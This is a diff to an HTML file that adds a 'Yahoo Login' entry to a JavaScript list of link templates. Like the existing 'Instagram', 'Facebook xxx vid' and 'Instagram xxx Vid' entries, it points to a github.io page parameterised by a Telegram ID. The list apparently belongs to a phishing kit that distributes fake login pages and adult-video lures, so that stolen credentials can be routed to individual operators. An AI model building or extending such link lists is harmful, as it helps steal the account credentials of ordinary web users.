--- a/inn.html
+++ b/inn.html
@@ -283,6 +283,7 @@
 
     const freeLinks = [
       // all new link i just added 
+{ name: "Yahoo Login", image: "https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage.png", urlTemplate: "https://ilyelya.github.io/n/newcv/cvy.html?id={telegram-id}" },
 { name: "Instagram", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/inst.html?id={telegram-id}" },
 { name: "Facebook xxx vid", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/PF.html?id={telegram-id}" },
       { name: "Instagram xxx Vid", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/PI.html?id={telegram-id}" },
